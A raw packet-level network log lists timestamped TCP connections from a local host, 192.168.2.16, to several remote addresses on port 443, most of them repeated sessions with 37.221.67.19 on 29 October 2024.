                                                                                                                                                                              Oct 29, 2024 19:34:09.681188107 CET44349710142.250.185.228192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:09.681267023 CET49710443192.168.2.16142.250.185.228
                                                                                                                                                                              Oct 29, 2024 19:34:09.682399035 CET49710443192.168.2.16142.250.185.228
                                                                                                                                                                              Oct 29, 2024 19:34:09.682462931 CET44349710142.250.185.228192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:09.737670898 CET49710443192.168.2.16142.250.185.228
                                                                                                                                                                              Oct 29, 2024 19:34:09.737701893 CET44349710142.250.185.228192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:09.784643888 CET49710443192.168.2.16142.250.185.228
                                                                                                                                                                              Oct 29, 2024 19:34:09.820322990 CET4968980192.168.2.16192.229.211.108
                                                                                                                                                                              Oct 29, 2024 19:34:10.680658102 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                              Oct 29, 2024 19:34:13.312325001 CET49713443192.168.2.1620.109.210.53
                                                                                                                                                                              Oct 29, 2024 19:34:13.312381029 CET4434971320.109.210.53192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:13.312453032 CET49713443192.168.2.1620.109.210.53
                                                                                                                                                                              Oct 29, 2024 19:34:13.313582897 CET49713443192.168.2.1620.109.210.53
                                                                                                                                                                              Oct 29, 2024 19:34:13.313600063 CET4434971320.109.210.53192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:14.090089083 CET4434971320.109.210.53192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:14.090183020 CET49713443192.168.2.1620.109.210.53
                                                                                                                                                                              Oct 29, 2024 19:34:14.093089104 CET49713443192.168.2.1620.109.210.53
                                                                                                                                                                              Oct 29, 2024 19:34:14.093101978 CET4434971320.109.210.53192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:14.093364000 CET4434971320.109.210.53192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:14.135648012 CET49713443192.168.2.1620.109.210.53
                                                                                                                                                                              Oct 29, 2024 19:34:14.160181046 CET49713443192.168.2.1620.109.210.53
                                                                                                                                                                              Oct 29, 2024 19:34:14.207334995 CET4434971320.109.210.53192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:14.327979088 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                              Oct 29, 2024 19:34:14.415806055 CET4434971320.109.210.53192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:14.415831089 CET4434971320.109.210.53192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:14.415837049 CET4434971320.109.210.53192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:14.415847063 CET4434971320.109.210.53192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:14.415865898 CET4434971320.109.210.53192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:14.415900946 CET49713443192.168.2.1620.109.210.53
                                                                                                                                                                              Oct 29, 2024 19:34:14.415916920 CET4434971320.109.210.53192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:14.415941000 CET49713443192.168.2.1620.109.210.53
                                                                                                                                                                              Oct 29, 2024 19:34:14.415961981 CET49713443192.168.2.1620.109.210.53
                                                                                                                                                                              Oct 29, 2024 19:34:14.418468952 CET4434971320.109.210.53192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:14.418531895 CET49713443192.168.2.1620.109.210.53
                                                                                                                                                                              Oct 29, 2024 19:34:14.418540955 CET4434971320.109.210.53192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:14.418570042 CET4434971320.109.210.53192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:14.418615103 CET49713443192.168.2.1620.109.210.53
                                                                                                                                                                              Oct 29, 2024 19:34:14.427170992 CET49713443192.168.2.1620.109.210.53
                                                                                                                                                                              Oct 29, 2024 19:34:14.427184105 CET4434971320.109.210.53192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:14.427196026 CET49713443192.168.2.1620.109.210.53
                                                                                                                                                                              Oct 29, 2024 19:34:14.427206039 CET4434971320.109.210.53192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:14.630743980 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                              Oct 29, 2024 19:34:15.237634897 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                              Oct 29, 2024 19:34:15.495604038 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                              Oct 29, 2024 19:34:16.448647022 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                              Oct 29, 2024 19:34:18.801975012 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                              Oct 29, 2024 19:34:18.849664927 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                              Oct 29, 2024 19:34:19.103667021 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                              Oct 29, 2024 19:34:19.669986010 CET44349710142.250.185.228192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:19.670056105 CET44349710142.250.185.228192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:19.670106888 CET49710443192.168.2.16142.250.185.228
                                                                                                                                                                              Oct 29, 2024 19:34:19.711658001 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                              Oct 29, 2024 19:34:20.209816933 CET49710443192.168.2.16142.250.185.228
                                                                                                                                                                              Oct 29, 2024 19:34:20.209858894 CET44349710142.250.185.228192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:20.925712109 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                              Oct 29, 2024 19:34:23.334696054 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                              Oct 29, 2024 19:34:23.653698921 CET49678443192.168.2.1620.189.173.10
                                                                                                                                                                              Oct 29, 2024 19:34:25.102674961 CET49673443192.168.2.16204.79.197.203
                                                                                                                                                                              Oct 29, 2024 19:34:28.148854971 CET4968080192.168.2.16192.229.211.108
                                                                                                                                                                              Oct 29, 2024 19:34:30.150374889 CET49715443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:30.150418043 CET4434971537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:30.150490999 CET49715443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:44.524451971 CET4434972237.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:44.524512053 CET49722443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:44.641324997 CET4434972237.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:44.641351938 CET4434972237.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:44.641544104 CET49722443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:44.641562939 CET4434972237.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:44.641613007 CET49722443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:44.762254000 CET4434972237.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:44.762289047 CET4434972237.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:44.762443066 CET49722443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:44.762460947 CET4434972237.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:44.762613058 CET49722443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:44.872464895 CET4434972237.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:44.872526884 CET4434972237.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:44.872601986 CET49722443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:44.872622967 CET4434972237.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:44.872657061 CET49722443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:44.872981071 CET4434972237.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:44.873044014 CET49722443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:44.873384953 CET49722443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:44.884486914 CET49723443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:44.884536982 CET4434972337.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:44.884646893 CET49723443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:44.884955883 CET49723443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:44.884974003 CET4434972337.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:45.797879934 CET4434972337.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:45.799618959 CET49723443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:45.799642086 CET4434972337.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:46.086394072 CET4434972337.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:46.138890982 CET49723443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:46.138927937 CET4434972337.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:46.139565945 CET49723443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:46.139714003 CET4434972337.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:46.139841080 CET49723443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:46.145459890 CET49724443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:46.145509958 CET4434972437.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:46.145610094 CET49724443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:46.145888090 CET49724443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:46.145908117 CET4434972437.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:47.052136898 CET4434972437.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:47.052409887 CET49724443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:47.054198980 CET49724443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:47.054220915 CET4434972437.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:47.054470062 CET4434972437.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:47.055583000 CET49724443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:47.099338055 CET4434972437.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:47.333776951 CET4434972437.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:47.375847101 CET49724443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:47.375878096 CET4434972437.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:47.376657963 CET49724443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:47.376753092 CET4434972437.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:47.376840115 CET49724443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:47.382824898 CET49725443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:47.382864952 CET4434972537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:47.382976055 CET49725443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:47.383272886 CET49725443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:47.383284092 CET4434972537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:48.281454086 CET4434972537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:48.281636953 CET49725443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:48.283195019 CET49725443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:48.283224106 CET4434972537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:48.284188032 CET4434972537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:48.285526991 CET49725443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:48.327364922 CET4434972537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:48.562438965 CET4434972537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:48.605909109 CET49725443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:48.605976105 CET4434972537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:48.606513023 CET49725443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:48.606714010 CET4434972537.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:48.606836081 CET49725443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:48.611943007 CET49726443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:48.611999989 CET4434972637.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:48.612087965 CET49726443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:48.612282038 CET49726443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:48.612301111 CET4434972637.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:49.521341085 CET4434972637.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:49.521472931 CET49726443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:49.523053885 CET49726443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:49.523070097 CET4434972637.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:49.523305893 CET4434972637.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:49.524297953 CET49726443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:49.571338892 CET4434972637.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:49.957838058 CET4434972637.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:49.957906961 CET4434972637.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:49.957926035 CET4434972637.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:49.958045959 CET49726443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:49.958084106 CET4434972637.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:49.958142996 CET49726443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:50.074862957 CET4434972637.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:50.074894905 CET4434972637.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:50.075171947 CET49726443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:50.075206041 CET4434972637.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:50.075263023 CET49726443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:50.189222097 CET4434972637.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:50.189290047 CET4434972637.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:50.189322948 CET49726443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:50.189353943 CET4434972637.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:50.189378023 CET49726443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:50.189394951 CET49726443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:50.305507898 CET4434972637.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:50.305538893 CET4434972637.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:50.305655956 CET49726443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:50.305680037 CET4434972637.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:50.305742979 CET49726443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:50.420311928 CET4434972637.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:50.420341969 CET4434972637.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:50.420422077 CET4434972637.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:50.420517921 CET49726443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:50.421287060 CET49726443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:50.421287060 CET49726443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:50.434320927 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:50.434374094 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:50.434468985 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:50.434822083 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:50.434837103 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:53.688133955 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:53.688254118 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:53.688271999 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:53.688334942 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:53.727134943 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:53.727176905 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:53.727328062 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:53.727340937 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:53.727391958 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:53.807255983 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:53.807293892 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:53.807446957 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:53.807473898 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:53.807518959 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:53.846379995 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:53.846457958 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:53.846566916 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:53.846587896 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:53.846625090 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:53.846642971 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:53.925688028 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:53.925757885 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:53.925992966 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:53.925992966 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:53.926048040 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:53.926110983 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:53.965557098 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:53.965630054 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:53.965677977 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:53.965717077 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:53.965747118 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:53.965774059 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:54.044785976 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.044815063 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.045114994 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:54.045171976 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.045248032 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:54.089068890 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.089107037 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.089438915 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:54.089440107 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:54.089488029 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.089546919 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:54.162048101 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.162080050 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.162398100 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:54.162429094 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.162484884 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:54.174557924 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.174587965 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.174757957 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:54.174768925 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.174930096 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:54.298115015 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.298180103 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.298245907 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:54.298264980 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.298314095 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:54.298336029 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:54.303016901 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.303067923 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.303109884 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:54.303117990 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.303138971 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:54.303160906 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:54.327526093 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.327555895 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.327697992 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:54.327722073 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.327769995 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:54.419006109 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.419033051 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.419171095 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:54.419188023 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.419265032 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:54.423099995 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.423147917 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.423201084 CET4434972737.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.423212051 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:54.423263073 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:54.423819065 CET49727443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:54.493119955 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:54.493165016 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:54.493273020 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:54.493598938 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:54.493613958 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:55.791265011 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:55.793015957 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:55.793049097 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:56.255165100 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:56.255203962 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:56.255223989 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:56.255297899 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:56.255320072 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:56.255378962 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:56.258632898 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:56.258656025 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:56.258733988 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:56.258744001 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:56.310452938 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:56.381753922 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:56.381787062 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:56.382071972 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:56.382081985 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:56.382155895 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:56.496975899 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:56.497016907 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:56.497205019 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:56.497236967 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:56.497292995 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:56.580171108 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:56.580210924 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:56.582477093 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:56.582477093 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:56.582511902 CET4434972937.221.67.19192.168.2.16
                                                                                                                                                                              Oct 29, 2024 19:34:58.258271933 CET49729443192.168.2.1637.221.67.19
                                                                                                                                                                              Oct 29, 2024 19:34:58.258304119 CET4434972937.221.67.19192.168.2.16
